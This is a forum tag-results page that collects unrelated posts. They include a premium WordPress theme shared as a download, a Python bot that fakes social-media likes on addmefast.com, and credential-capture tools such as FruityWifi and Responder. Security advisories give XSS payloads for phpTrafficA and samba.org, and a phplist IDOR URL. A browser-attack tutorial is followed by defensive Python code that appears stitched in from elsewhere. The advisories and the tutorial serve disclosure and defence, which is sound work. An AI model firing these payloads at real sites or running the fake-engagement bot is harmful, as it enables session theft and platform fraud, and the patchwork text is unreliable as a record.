Showing results for tags 'page'.

  1. Filip – IOS App Store v.2.0.1200 Premium WordPress Theme for Affiliate iOS Apps from iTunes. About IOS App Store: the Flip IOS App Store premium WordPress theme allows you to build an iOS app store like Google Play or the iTunes App Store. It is fully automatic; no maintenance is needed. Flip IOS App Store features: iTunes Affiliate Integration: the IOS App Store theme integrates the iTunes affiliate application. You can use your iTunes affiliate ID on your website; if you don't have an iTunes affiliate account, you can sign up for one easily. Import Genres As Categories: you can import iTunes affiliate genres as categories on your website with one click, which saves time when creating application categories for your website. Easy Featured Categories: you can manage the featured categories of your website and choose any category as featured in the category option panel. Automatic App Import: application feeds are imported to your website automatically. You can choose your location, import cycle, feed type, ... and how many items to import to your website. If you don't want automatic import, you can turn it off. Targeted App Import: you can import iOS applications to your website from a keyword; just enter the keyword, search and publish. Mobile Ready: our themes support all modern devices, including iPhone, iPad, Android, ...; your visitors can use any device to visit your website. Custom Background: you can change the background of the header, footer or the website as a whole. With our themes you change it very easily in the Theme Option Panel: upload an image, change the color, ... Unlimited Sidebars: with our themes you can create an unlimited number of sidebars from the Sidebar Control Panel. It allows you to assign a custom sidebar to every single page, archive or index, and you can always use the default ones as well. Compatible with all browsers: our themes are compatible with the most popular internet browsers. It's important that your website performs well for everyone who visits it.
    Themed Login & Signup Pages: we don't use the default WordPress login and register pages. Our themes have a separate login page and register page, which makes your website friendlier and easier to use. Google Analytics: Google Analytics or other tracking code can easily be added to your website in the theme option panel. Tracking Code: our themes have a panel option that helps you add tracking code for each page and post on your website. It helps you easily track visitors to your website and find better marketing solutions for your websites. Easy layout change: by default we integrate the best layout for your website; however, you can change the layout of your website in the theme option panel with one click. Search Engine Optimized: with our themes you won't need to install plugins; SEO is included in our themes. You can easily add meta tags, keywords, ... for each page, or they will be generated automatically for your posts, pages and other pages. Easy logo and favicon change: you can easily upload a favicon and logo and change the logo position on your website ... Auto-Updates: our themes automatically check for new versions and update your website. New versions are announced in the admin control panel or by e-mail. You can choose automatic or manual install mode. Easy Description: by default, WordPress uses the top of the content of your post or page, or the post excerpt (if the theme supports it). With our themes you can set a custom description for your post or page; you can choose any content you like. Page Options: unlike other themes, you can choose to hide or display the title, author, categories, tags, ... of each page, post, ... You can do it very easily in the Post Panel. Easy Sidebar Control: with our themes you can control the layout of each sidebar; you can select a layout for a sidebar and turn it on or off ... Unlimited Fonts: our themes support all Google Fonts; you can use any Google Font you like. If you don't want to use Google Fonts, you can upload your own font to your website. It is very easy to do in the Font Panel.
    HTML5 / CSS3: we believe modern WordPress themes should use modern technologies. Every theme in our catalogue is based on HTML5 / CSS3 (progressively). DEMO: Top App for iPhone, iPad - IOS App Store. Theme Page: Filip - IOS App Store - SuuPress.com. Download: iosappstore-full.zip - Google Drive
  2. I'm buying a foreign Facebook page; I'm interested in its age, not necessarily the likes or the number of followers.
  3. FruityWifi is a wireless network auditing tool based on the Wifi Pineapple idea. The application can be installed on any Debian-based system. Tested on Debian, Kali Linux, BugTraq, Kali Linux ARM (Raspberry Pi), Raspbian (Raspberry Pi) and Pwnpi (Raspberry Pi). With the new version it is possible to install external modules. This functionality gives the user more flexibility, and FruityWifi can be customized. Modules can be added or removed at any time using the online repository. A new modules panel was added to the status page; all modules can be enabled/disabled from this panel. The new phishing option allows the feature to be enabled/disabled from the status page. The Responder.py module has been released and can be installed from the modules page (an HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server can be enabled to capture usernames, passwords and NTLM/LM hashes). Download: https://github.com/xtr4nge/FruityWifi
  4. ....................
  5. Admin Page Finder 5.0 Download: DepositFiles
  6. This is an admin page finder written in Python. The source is not entirely mine, so I don't want spiteful comments. I thought I'd post it because it can genuinely help some people. PS: Sorry for the example site, but nothing else came to mind except Viorel's site. Download LINK: Download ADMIN PAGE FINDER By Cyb3rGhost
  7. Guest

    First page

    Hi, I'd have a suggestion for the "first page", namely an option to select more results per page. Like, right now there are 20, and it should be possible to choose 30/40/50/100. Maybe the suggestion is irrelevant, but oh well.
  8. Hi. I installed Premium SEO Pack, and for the XML sitemap it gives me this error. Can anyone help me? This page contains the following errors: error on line 5 at column 51: xmlns:schemaLocation: 'http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd' is not a valid URI Below is a rendering of the page up to the first error.
  9. AddMeFast-Bot

    Automating the process of liking/subscribing/viewing etc. on addmefast.com in order to get points and benefit from their service.

    Update: not working anymore, 01-10-2015

    import mechanize
    import re
    from time import sleep
    import threading

    #cut something in many parts
    def chunkIt(seq, num):
        avg = len(seq) / float(num)
        out = []
        last = 0.0
        while last < len(seq):
            out.append(seq[int(last):int(last + avg)])
            last += avg
        return out

    #generates a browser
    def genbrowser():
        br = mechanize.Browser()
        br.set_handle_robots(False)
        br.set_handle_redirect(True)
        br.addheaders = [('User-agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.6.5')]
        return br

    class AMB(threading.Thread):
        # define environment variable
        def __init__(self, rangex, user, passw):
            self.br1 = genbrowser()
            self.alogin(self.br1, user, passw)
            self.range = rangex
            threading.Thread.__init__(self)
            self.timeout_value = 30

        # log the user in
        def alogin(self, br, user, passw):
            br.open('http://addmefast.com', \
                    'email={0}&password={1}&login_button=Login'.format(user.replace('@','%40'), passw))
            if 'Welcome' in br.response().read():
                print "Login successful on add me fast"

        #main function
        def run(self):
            sleep(1)
            for i in self.range:
                try:
                    #goes to a page with many links to like
                    #self.br1.open(
                    #act=getLinksList&params={"network":"1", "page":"1", "isFBpage":"1"}
                    self.br1.open('http://addmefast.com/includes/ajax.php',
                                  'act=getLinksList&params={"network":"1", "page":"%s", "isFBpage":"1"}' % (i), timeout=self.timeout_value)
                    #gets this : title="http://www.facebook.com/Ocacadordetrolls" id="L_b89734d43ed3a3dce20eeaab183365
                    page_and_Lid = re.findall('div class="freepts_row" title="(.*)" id="(.*)["]{1}>', self.br1.response().read())
                    #confirmSubscribe(162255, "http://www.facebook.com/TOKZ.cs", "02c08e63ec34b4c0b562ed71162255", "1", 0, "UV9W49sV%2FYIQeuGBKkE7PauwNpaJf345m0G%2FDOM3SA6GKryoh8Vrk212");
                    number_and_token = re.findall("""getFBLikesBef\((.*)[,]{1} ".*["]{1}, ".*["]{1}, "1", 0, "(.*)["]{1}\);""", self.br1.response().read())
                    i = 0
                    while i < len(page_and_Lid):
                        page = page_and_Lid[0]
                        Lid = page_and_Lid[1]
                        number = number_and_token[0]
                        token = number_and_token[1]
                        #http://addmefast.com/includes/ajax.php, act=checkFollowed&params={"id":"L_b89734d43ed3a3dce20eeaab183365", "url":"http://www.facebook.com/Ocacadordetrolls", "network":"1"}
                        self.br1.open('http://addmefast.com/includes/ajax.php', 'act=checkFollowed&params={"id":"%s", "url":"%s", "network":"1"}' % (number, page), timeout=self.timeout_value)
                        #http://addmefast.com/includes/ajax.php, act=updateAction&params={"link_id":"L_b89734d43ed3a3dce20eeaab183365", "url":"http://www.facebook.com/Ocacadordetrolls", "network":"1", "IXY5pZpE":"UV9W49sV%2FYIQeuGBKkE7PauwNpaJf345m0G%2FDOM3SA6GKryoh8Vrk212"}
                        self.br1.open('http://addmefast.com/includes/ajax.php', 'act=updateAction&params={"link_id":"%s", "url":"%s", "network":"1", "IXY5pZpE":"%s"}' % (Lid, page, token), timeout=self.timeout_value)
                        print "New shit made"
                        i += 1
                except Exception, e:
                    print e

    if __name__ == '__main__':
        nbthreads = input('Number of threads: ')
        z = chunkIt(range(1, int(open("number.txt").read()) + 1), nbthreads)
        user, passw = open('account.txt').read().split(':', 1)
        while 1:
            for i in z:
                try:
                    AMB(i, user, passw).start()
                except:
                    pass
            while threading.activeCount() > 1:
                sleep(1)

    Source
  10. Product: phpTrafficA
    Product page: phpTrafficA Homepage
    Affected versions: Up to and including 2.3 (latest as of writing).

    Description: The user agent string provided by the browser is neither sanitized nor escaped when handled. This string is then output into HTML code on the "Latest visitors > Details" page, leading to HTML injection that can be abused to perform XSS. For example, the following user agent will cause a JavaScript dialog box to pop up as soon as the page is visited:

        "><script>alert();</script>

    This page can be hidden from the public, in which case only admins can visit it. However, the script still executes when they do, which could enable a malicious user agent to steal the phpTrafficA cookie (no expiry) or other admin credentials.

    Proposed fix: Escape the HTML characters with htmlspecialchars before outputting the user agent string.

    In: Php/stats/statsRecent.inc.php

    Line 304:

        echo "<tr class=\"data av $even $clrobots $clreturn\"><td nowrap>$end</td><td> $dur</td><td align=\"center\"> ".format_float($hits)." </td><td> <a href=\"./index.php?mode=stats&sid=$sid&show=clickstream?=$lang&ip=$ip\" title=\"".$strings['Moreinfovisitor']."\" class=\"basic\">$ipText</a> </td><td align=\"center\"> ".format_float($visits)." </td><td>".countryFlag($country)."</td><td>".osImg($os,'')."</td><td>".browserImg($wb,$agent)."</td><td>$page</td><td>$refString</td></tr>\n";

    becomes:

        echo "<tr class=\"data av $even $clrobots $clreturn\"><td nowrap>$end</td><td> $dur</td><td align=\"center\"> ".format_float($hits)." </td><td> <a href=\"./index.php?mode=stats&sid=$sid&show=clickstream?=$lang&ip=$ip\" title=\"".$strings['Moreinfovisitor']."\" class=\"basic\">$ipText</a> </td><td align=\"center\"> ".format_float($visits)." </td><td>".countryFlag($country)."</td><td>".osImg($os,'')."</td><td>".browserImg($wb,htmlspecialchars($agent))."</td><td>$page</td><td>$refString</td></tr>\n";

    Line 369:

        $echo = "<tr><td valign=\"top\" colspan=\"3\">$ip ($whoislink$baniplink)<br>$host<br>$labelTxt<table class=\"basic\"><tr><td>".countryNameFlag($country)."</td></tr></table></td><td valign=\"top\" colspan=\"2\">".$strings['Agent'].": $thisagent<br><table class=\"basic\"><tr><td>".osImgName($os)."</td><td>".browserImgName($wb)."</td></tr></table>".$strings['Referrer'].": ";

    becomes:

        $echo = "<tr><td valign=\"top\" colspan=\"3\">$ip ($whoislink$baniplink)<br>$host<br>$labelTxt<table class=\"basic\"><tr><td>".countryNameFlag($country)."</td></tr></table></td><td valign=\"top\" colspan=\"2\">".$strings['Agent'].": ".htmlspecialchars($thisagent)."<br><table class=\"basic\"><tr><td>".osImgName($os)."</td><td>".browserImgName($wb)."</td></tr></table>".$strings['Referrer'].": ";

    Best regards,
    Daniel Geerts

    Source: http://packetstorm.wowhacker.com/1504-exploits/phptraffica23-xss.txt
  11. Abstract Web browsers or mobile browsers are software applications that act as the intermediary applications between a user and the World Wide Web and are used to access information from the Web. Some of the popular browsers which we are using in our daily life are Google Chrome, Mozilla Firefox, Internet Explorer, Opera, Safari, etc. With their wide usage and increasing popularity, they have become one of the major targets for exploitation by hackers. A small mistake during the coding of the application may result in it being vulnerable to intrusions. This article is going to cover a few browser-based attacks, which are not browser specific and can be exploited on any browser if not closed by the application developers during writing or designing the application. The following browser-based attacks, along with the mitigation, are going to be covered in this article: Browser cache: Obtaining sensitive information from the cache stored in browsers. Back and Refresh attack: Obtaining credentials and other sensitive data by using the Back button and Refresh feature of the browser. Passwords in browser memory: Getting the password or credit card details stored in the browser’s physical memory. Autocomplete: Obtaining the credentials of a user from the stored password in the browser. Browser history: Sensitive information leaked through the URL from the browser’s history. 1. Browser Cache Every time when a website is opened, the contents of that web page are sent to the browser’s temporary cache folder of a user’s machine. If those contents on that web page need to load again, the browser opens the page from the cache instead of downloading the page again. If some web application stores and shows the sensitive information to the user (such as their address, credit card details, username), this information could also be stored for caching, and hence it is retrievable through examining the browser’s cache. 
In IE, these pages are stored in C:\Users\<user_name>\AppData\Local\Microsoft\Windows\Temporary Internet Files In Firefox, these pages are stored in C:\Users\<user_name>\AppData\Local\Mozilla\Firefox\Profiles\<profile-id>\Cache Or by typing the following URL in the address bar of the browser: about:cache In Chrome, these pages are stored in C:\Users\<user_name>\AppData\Local\Google\Chrome\User Data\Default\Cache Or by typing the following URL in the address bar of the browser: chrome://cache Proof of Concept This demo is shown in the Mozilla Firefox browser. Log in to the application, access a few pages and then log out of the application. In the address bar, type about:cache. This shows the cache store in the browser. Go through the list and access the cache content of the website you are interested in. The following screenshot shows the URL for the user dashboard. The user dashboard can have sensitive information like address, phone number, mapped credit card details, e-mail ID, etc. On opening a specific cache entry, the user dashboard can be seen along with the address, phone number, order history, etc. This is shown in the following screenshot Mitigation This problem can be mitigated by setting proper cache control attributes in the response header. Mainly there are two types of cache attributes: 1. Cache-control: no-cache The no-cache attribute indicates that the browser should not use the information that is cached for that particular request–response pair. The browser stores the cache, but instead of showing the content from the cache, it sends the request to the server each time. But again, the cache will be only be in the browser and can be easily accessed by an attacker or malicious user. 2. Cache-control: no-store The no-store attribute indicates that the request–response pair should not be cached and stored in the browser. This applies to the entire page. 3. Using HTML meta tags You can implement the cache control using Meta tags also. 
Meta tags can be set as follows: <meta http-equiv=”Cache-Control” content=”no-cache” /> <meta http-equiv=”Cache-Control” content=”no-store” /> Here, if the cache-control header is manually appended in the HTTP response and set to no-cache, as shown in the following screenshot, the browser will still cache the page. If the browser cache is accessed, the cached pages of a user’s dashboard can be found. Opening it in Offline mode will show the order details, as shown in the screenshot below. Now, if the value of a cache-control header is set to no-store, no-cache and the browser cache is accessed, the cached pages of a user’s dashboard will not be found. This is shown in the following screenshots. Hence, the developer should analyze the web page content and implement proper cache-control attributes on the pages storing sensitive data. 2. Password in browser memory Most of the applications and servers store the password in hashed or encrypted format, but such hashing/encryption is not applied while storing passwords in the browser memory. The GET and POST requests on any sensitive page where the user is supplying sensitive information (like credentials, credit card number, etc.) is stored in the browser memory while it is open. An attacker with local access to the system can read the sensitive data using memory-reading tools like WinHex. An adversary with physical access to the user’s open browser, after logout, can thus steal the sensitive data from the memory. Once sensitive data like a password is discovered, attackers can escalate their privileges in the application. Proof of Concept Access the application. Enter the valid credentials, as shown in the following screenshot, and browse through the application. After logging out of the application, do not close the browser. Open any memory reading tool like “Winhex” and navigate to the following path, as shown in the screenshots below: Tools ? Open Ram ? Choose a browser (in this case Firefox) ? 
Select Entire Memory Search through the data using the username. The complete login request for that specific application can be obtained, as shown in the screenshot below. From here, an attacker can steal the login credentials of a user and escalate his privilege. Mitigation As this problem is present in the browser/local machine, using SSL will not mitigate this. A user can’t stop the browser from storing the password or other sensitive information. A solution has to be implemented through which the attacker can’t replay the password value obtained from the physical memory. So, the solution for this is to implement salted hashing. Instead of sending the password to the server, send the salted hash value of the password. Here is how the salted hashing technique works: Store the MD5 hash of the password in the database. (MD5 hash is a cryptographic technique in which the actual value can never be recovered). When a client requests for a login page, the server generates a random number called salt and sends it to the user along with the page. A JavaScript present on the client machine calculates the MD5 hash of the password entered by the user. It then combines the hash value with the salt value and recalculates the hash value. This hash value is sent to the server. The server picks the hash value of the password from its database, combines it with the salt value and calculates the MD5 hash value. If both the values match (it will happen only when the user enters the correct password), the user is authenticated to the application. Every time the salt value will be different; hence, even if the attacker gets the hashed password from the browser’s memory, he can’t replay it. Another solution could be implementing a JavaScript, which forcefully closes the browser once the user is logged out of the application. This will flush the complete memory of the browser, and hence no data can be retrieved from the browser’s memory. 3. 
Back and Refresh attack Browsers have the ability to maintain a recent record of pages that were visited by a user. The Back and Forward buttons on browsers use this functionality to display the pages recently browsed. In addition, browsers also keep track of variables like username, password, credit card details, etc. that were POSTed to the server while fetching the page. If a user logs in to the website, performs some actions and then logs out, and an adversary has access to the same machine as the user, he can see the logout page that is displayed on the browser window. He can then click the Back button until he reaches the page shown after a successful login. Here, the attacker can click the Refresh button, and the browser automatically resubmits the request with all the information. Proof of Concept Consider the Change Password page of an application: Log in to the application and access the Change Password page. Enter the values in the Current Password and New Password fields and click Submit. The request and response series for the Change Password request are shown in the following screenshots. Request Response The following screenshot shows that the password gets changed successfully. Browse through the application and then log out of the application. After logout, leave the machine without closing the browser window. An attacker who has physical access to this machine can simply click the Back button drop-down list and identify the page which comes after the Change Password page. This is depicted in the following screenshot. When a specific page is clicked, the browser displays the warning that the page has expired, as shown in the following screenshot. At this point the attacker can start a browser proxy tool like Burp and configure the browser to send its requests through the proxy. On the error page, the adversary clicks the Refresh button. 
The browser shows a pop-up warning to the user about reposting some of the variables in order to access the page, as shown in the screenshot below. The attacker clicks the “Resend” button. The attacker can see the request going to server using the configured proxy tool and can steal the password value of the user. This is shown in the screenshot below. Variation of the attack Many times it has been observed that the site is using redirection on successful login but not on unsuccessful login. If a login page is secured by CAPTCHA and the user provides the correct credentials but the wrong CAPTCHA value, then the user is again served with the login page with an error message. In this case too, an attacker can steal the credentials using the Back and Refresh features. Even if CAPTCHA is not implemented, an attacker can get some sensitive information like correct username or password. Proof of Concept Access the login page of the application and provide the correct username and wrong password, as shown in the following screenshot. After validating the credentials, the server responds with a “200 OK” with error stating “Username/Password is wrong”. This is shown in the screenshots below. Click the Back button and access the page which came after providing the incorrect credentials, as shown in the following screenshot. The browser warns that the document has expired and asks the user to resend the data to the server, as shown in the following screenshot. Configure the proxy between the browser and server and intercept the data going to the server. Click the “Resend” button. The user credentials can be seen in cleartext in the captured request, as shown in the following screenshot. Cause of problem The browser keeps track of the requests sent to server to fetch particular pages. In this case, the Change Password page is “changepass.aspx” and the page which appears after is “changepass1.aspx”. 
The “changepass1.aspx” page is displayed after providing the Current, New and Confirm Password values. So, the browser remembers the request which is sent to get the “changepass1.aspx” page. The following steps are present for the existing scenario: The user accesses the “changepass.aspx” page. The user types the current password, new password, and confirm new password and submits the request which is sent to “changepass1.aspx”. The user is authenticated in the “changepass1.aspx” page. The user is served with the “changepass1.aspx” page. When the attacker clicks the “changepass1.aspx” page, the request which was sent to render “changepass1.aspx” is resent to the server. This request contains the current, new and confirm new password values. Mitigation The following steps will be performed if an intermediate page is implemented between “changepass.aspx” and “changepass1.aspx”: The user accesses the “ChangePass.aspx” page. The user types the current password, new password, and confirm new password and submits the request to “CheckPass.aspx” The user is authenticated in the “CheckPass.aspx” page. The user is redirected to the “ChangePass1.aspx” page. The browser sends a new request to fetch the “ChangePass1.aspx” page. Now, even if an attacker refreshes the “changepass1.aspx” page, the request which the browser used to get “changepass1.aspx” will be sent, which is a redirect request sent by “CheckPass.aspx”. The request will be a simple GET request for fetching “ChangePass1.aspx” and there will be no value going in that request. The solution should be implemented on all the pages where a form is being submitted or some sensitive action is happening. 4. Autocomplete In many applications, when the user submits credentials, the browser shows a pop-up for remembering the password. If the user clicks “Remember password”, the browser will store the password and automatically enter it when the same application is accessed again. 
The feature is convenient for users, as they don’t have to remember and enter the password, but it poses a problem if the user is using this feature on a shared or public computer. An attacker can easily retrieve the stored password from the browser. Even if the stored passwords are encrypted or protected by the master password (a password to access the stored passwords), an attacker can retrieve this password by visiting the application, for which the password is stored, in the browser. An attacker enters the username and the browser automatically fills the password field. An attacker can run a proxy tool like Burp to intercept the request going to server and then can obtain the cleartext or encrypted password going to server. The saved password can be accessed by navigating to: Firefox: Options ? Security ? Saved Password Chrome: Settings ? Manage password (Under password and forms) IE: Internet Options ? Content ? AutoComplete Settings ? Manage Passwords Proof of Concept Here, after entering the credentials, the browser shows a popup asking the user if the password for the website should be remembered. This is depicted in the screenshot below. If the user clicks “Remember Me”, the password will be stored in the browser. In Firefox, the saved password can be accessed by navigating to Tools ? Options ? Security ? Saved Password. This is depicted in the following screenshot. When the “Saved Passwords” button is clicked, the browser shows the list of websites for which the passwords are stored in the browser. This is shown in the following screenshot. If the “Show Passwords” button is clicked, the user will be able to see the stored passwords, as shown in the screenshot below. Now, suppose the list of stored passwords is secured by a master password in the browser. Then the user has to enter the master password to access the list, as shown in the screenshot below. 
In this case, an adversary needs to use an intermediate proxy tool to intercept the request going to the server. Go to the application and double click the username field. It will show the list of the stored usernames. Click one username and the browser will automatically fill the password from the stored password list. This password can’t be seen, as it is hidden behind the asterisk symbol. A user can click the Submit button and capture the request going to server using a web proxy tool like Burp. From the intercepted request, it is easy to find the password of submitted username, as the data can be seen in cleartext. This is shown in the following screenshot. Mitigation The problem can be solved by setting the Autocomplete attribute in the Login and other sensitive pages. Make sure the Autocomplete attribute for all sensitive pages is set to “off”. A sensitive page can be the Login page, change password page, edit information page, etc. If Autocomplete is not configured on the page, then by default it is “ON” and the application will store the information. This can be done using the following command: < form autocomplete=”off”> – It will set Autocomplete to “OFF” for all form fields in the page. Even if the browser is configured to store the password, the above code will overwrite the browser settings. The Autocomplete attribute is ignored in the latest versions of all browsers. Hence, the above solution won’t work for the latest versions of the browsers. As a security best practice, a user should be warned with a generic warning message about storing the cleartext password in the browser. A more advanced way of implementation, involving HTML and JavaScript, can be used. A sample code is available here. 5. Browser history When a user submits any data, it goes to the server either in a GET request or in a POST request. In a GET request the user data is present in the URL itself, whereas in a POST request the user data is present in the body of the request. 
The following two screenshots show user data going in GET and POST requests. All GET requests that are accessed from the browser are stored in the browser’s history and cache. This data can be viewed even if the user is logged out or the browser is closed by checking the history of the browser. So, if an application sends the user’s sensitive information through a GET request, i.e. through the URL, an attacker can obtain this data by checking the browser history.

GET request:

POST request:

Proof of Concept

Here, after entering the credentials on the website when the user clicks the LOG IN button, the credentials are sent in a GET request. This is shown in the following screenshot.

The request going to the server is captured in Burp, which shows that the user provided data is sent as a GET request. This is depicted in the following screenshot.

So, an attacker who has physical access to the user’s machine can see these credentials in the browser’s history, as shown in the screenshot below.

In the same way, if an application sends other sensitive data like credit card details through the GET request, the data can be accessed from the browser history.

Mitigation

Never send sensitive information in the GET request. Data containing sensitive information should be sent through the POST request. When sensitive information is sent in the POST request, the data goes in the request body, and hence can’t be accessed from the browser history, because the browser history only shows the GET requests. Implement the POST method in the form as shown below:

<form name="login" action="index_submit" method="POST" accept-charset="utf-8">

The above screenshots show that no sensitive data is being stored in the browser history when the application is using POST instead of the GET method.

Conclusion

So, we have now discussed some browser-based attacks in this article. These attacks are applicable on web as well as mobile browsers.
To perform any of the above attacks, an attacker has to depend on the following points:

- The attacker should have physical access to the victim’s machine.
- For some attacks, the browser should not be closed.
- The victim should not delete the browsing history, cache, etc.

Due to all these limitations, the risk rating for all the above mentioned attacks ranges from Medium to Low, but depending on the information received, it can be high too. If an attacker can get account/credit/debit card details in the browser’s cache or through the Back and Refresh attack, then the risk rating would be high. All these vulnerabilities can be avoided by implementing the proper controls discussed in this article.

References

https://devcenter.heroku.com/articles/increasing-application-performance-with-http-cache-headers
https://www.owasp.org/index.php/Testing_for_Vulnerable_Remember_Password_(OTG-AUTHN-005)
http://repo.hackerzvoice.net/depot_cehv6/CEHv6%20Module%2059%20How%20to%20Steal%20Passwords/Stealing_passwords_via_browsers.pdf

Source
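The two mitigations from the article above (autocomplete="off" on sensitive fields and POST instead of GET for credentials) come together on the server that renders the login page, and the Heroku reference in the list adds the third piece, cache headers. The following is an added example, not code from the article; the route name /login, the field names and the SENSITIVE word list are assumptions made for the demonstration.

```python
"""Server-side hardening of a login page: POST form, autocomplete="off" on
credential fields, and a non-cacheable response. Added example with assumed
route and field names, not the article's own code."""
from html import escape
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit


def render_login_form(action="/login", error=""):
    """Return the login page. Credentials travel in the POST body, so they
    never appear in the URL, browser history or server access logs. The
    autocomplete attribute is set on the form and on each credential field;
    newer browsers may ignore it for password managers, so treat it as
    defence in depth rather than a guarantee. The error text is escaped
    because it is reflected into the page."""
    msg = f'<p class="warn">{escape(error)}</p>' if error else ""
    return (
        "<!doctype html><html><head><title>Sign in</title></head><body>"
        f"{msg}"
        f'<form name="login" action="{escape(action, quote=True)}" '
        'method="POST" accept-charset="utf-8" autocomplete="off">'
        '<input type="text" name="username" autocomplete="off">'
        '<input type="password" name="password" autocomplete="off">'
        '<button type="submit">LOG IN</button>'
        "</form></body></html>"
    )


def no_store_headers():
    """Headers that keep the page (and any form data echoed into it) out of
    browser and proxy caches, so Back/Refresh or a cache viewer cannot
    replay it after logout."""
    return {
        "Cache-Control": "no-store, no-cache, must-revalidate, max-age=0",
        "Pragma": "no-cache",
        "Expires": "0",
    }


# Assumed list of parameter-name fragments that should never travel in a URL.
SENSITIVE = {"password", "passwd", "pwd", "card", "cvv", "ssn", "token"}


def leaks_sensitive_query(url):
    """Defensive check for a log/proxy review: True when a URL carries a
    query parameter whose name looks sensitive, i.e. data that would end up
    in browser history the way the GET login request above does."""
    query = urlsplit(url).query
    for pair in query.split("&"):
        name = pair.split("=", 1)[0].lower()
        if any(word in name for word in SENSITIVE):
            return True
    return False


class LoginHandler(BaseHTTPRequestHandler):
    """Minimal handler that serves the hardened form with the cache headers."""

    def do_GET(self):
        if urlsplit(self.path).path != "/login":
            self.send_error(404)
            return
        body = render_login_form().encode("utf-8")
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        for name, value in no_store_headers().items():
            self.send_header(name, value)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    # Local demo only: http://127.0.0.1:8080/login
    HTTPServer(("127.0.0.1", 8080), LoginHandler).serve_forever()
```

Run it and request /login: the response carries Cache-Control: no-store and a form that posts its fields. The leaks_sensitive_query helper is the check to run over access logs or a proxy history to find requests that already send credentials in the URL.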
12. # Affected software: phplist
# Type of vulnerability: insecure object reference
# URL: phplist.com
# Discovered by: Provensec
# Website: http://www.provensec.com
# version: phpList ltd. - v3.0.10
# Proof of concept
insecure object referenced on page deletion
vuln param: delete
example: http://demo.phplist.com/lists/admin/?page=send&delete=2&tk=035d99
ref: https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_%28OTG-AUTHZ-004%29
Source
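The phplist report above names only the parameter (delete) and the pattern (insecure direct object reference). The check that closes this class of bug is an object-level authorization test on the delete action. The following is an added example and not phplist code: the Campaign/Store model, the actor names and the superadmin flag are assumptions; the query-string shape is the one in the report's example URL.

```python
"""Insecure direct object reference on a delete action, next to the
object-level authorization check that closes it. Added example with an
assumed data model, not the application's own code."""
from dataclasses import dataclass, field
from urllib.parse import parse_qs


@dataclass
class Campaign:
    """Constructed sample record: one message/campaign owned by an admin."""
    id: int
    owner: str


@dataclass
class Store:
    campaigns: dict = field(default_factory=dict)
    audit: list = field(default_factory=list)

    def delete_insecure(self, actor, campaign_id):
        """The vulnerable shape: the only check is that the id exists, so
        any authenticated user can remove another user's record just by
        changing the id in the request (actor is never consulted)."""
        if campaign_id not in self.campaigns:
            return False
        del self.campaigns[campaign_id]
        return True

    def delete_checked(self, actor, campaign_id, superadmin=False):
        """Fixed shape: the record must exist AND belong to the actor (or
        the actor holds a global role). 'Not found' and 'not yours' give the
        same answer, so ids cannot be enumerated through the response, and
        every denial is recorded for detection of id probing."""
        record = self.campaigns.get(campaign_id)
        if record is None or not (superadmin or record.owner == actor):
            self.audit.append(f"DENY delete id={campaign_id} actor={actor}")
            return False
        del self.campaigns[campaign_id]
        self.audit.append(f"ALLOW delete id={campaign_id} actor={actor}")
        return True


def handle_delete_request(store, actor, query_string, superadmin=False):
    """Parse a query string of the shape in the report
    ('page=send&delete=2&tk=...') and route it through the checked delete.
    Non-numeric ids are rejected before any lookup happens."""
    params = parse_qs(query_string)
    raw = params.get("delete", [""])[0]
    if not raw.isdigit():
        return False
    return store.delete_checked(actor, int(raw), superadmin)


if __name__ == "__main__":
    s = Store({1: Campaign(1, "alice"), 2: Campaign(2, "bob")})
    print(handle_delete_request(s, "alice", "page=send&delete=2&tk=abc"))
    print(s.audit)
```

The test in a real code base is the same as the last two lines: call the delete endpoint as one user with another user's id and confirm the record survives and the denial is logged.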
13. ######################################################################
# Exploit Title: Samba.org and OpenLDAP.org Reflected XSS
# Date: 02/04/2015
# Author: Yann CAM @ Synetis - ASafety
# Vendor or Software Link: www.samba.org & www.openldap.org
# Version: /
# Category: Reflected Cross Site Scripting
# Google dork:
# Tested on: Samba.org and OpenLDAP.org main domains
######################################################################

Samba description :
======================================================================
Samba is a free software re-implementation of the SMB/CIFS networking protocol, and was originally developed by Andrew Tridgell. Samba provides file and print services for various Windows clients and can integrate with a Windows Server domain, either as a Domain Controller (DC) or as a domain member. As of version 4, it supports Active Directory and Windows NT domains.

www.samba.org is the main domain of the project.

OpenLDAP description :
======================================================================
OpenLDAP is a free, open source implementation of the Lightweight Directory Access Protocol (LDAP) developed by the OpenLDAP Project. It is released under its own BSD-style license called the OpenLDAP Public License.

www.openldap.org is the main domain of the project.

JitterBug project description :
======================================================================
JitterBug is a web based bug tracking system. It was originally developed by Andrew Tridgell to handle bug tracking, problem reports and queries from Samba users. It is now available under the GNU General Public License in the hope that it will be useful for other projects.

JitterBug operates by receiving bug reports via email or a web form. Authenticated users can then reply to the message, move it between different categories or add notes to it. In some ways JitterBug is like a communal web based email system.

This web page is itself a JitterBug page.
You can get an idea of what JitterBug can do by playing with the various links and buttons.

JitterBug was used by many other open-source projects like Gnome, rsync, The Gimp, linux-patches, ProFTPD, Willows, Java Linux, WindowMaker, mod_ssl, GnuCash or OpenLdap. Only OpenLDAP and Samba use it currently, so they are both impacted by the vulnerability described here.

RXSS Vulnerability description - PoC :
======================================================================
A reflected XSS is available in the JitterBug bug tracking project provided on the samba.org and openldap.org websites. Through this vulnerability, an attacker could tamper with page rendering, redirect victims to fake Samba/OpenLDAP portals, or capture Samba's (OpenLDAP) users' credentials such as cookies. It's also possible to forge a fake page with this XSS to provide a backdoored version of software to users.

This reflected XSS is on the GET "id" variable, which is not properly sanitized before being used in the page.

Tested on Firefox 35.0.

PoC:
http://www.samba.org/cgi-bin/jitterbug/CVS?id=1337</TITLE><img src=x onerror="alert(/Reflected XSS - Yann CAM @asafety/)" /><TITLE>;selectid=1337

JitterBug future :
======================================================================
As indicated by Samba :
The JitterBug project is no longer being actively maintained. Jitterbug has known unfixed security vulnerabilities. Unless you know exactly what you are doing, you should not use it any more. If you wish to take over as the maintainer then please contact Andrew Tridgell at jitterbug@tridgell.net

A possible patch is to sanitize each call of the jitterbug.c file :
void print_title(char *fmt, ...)
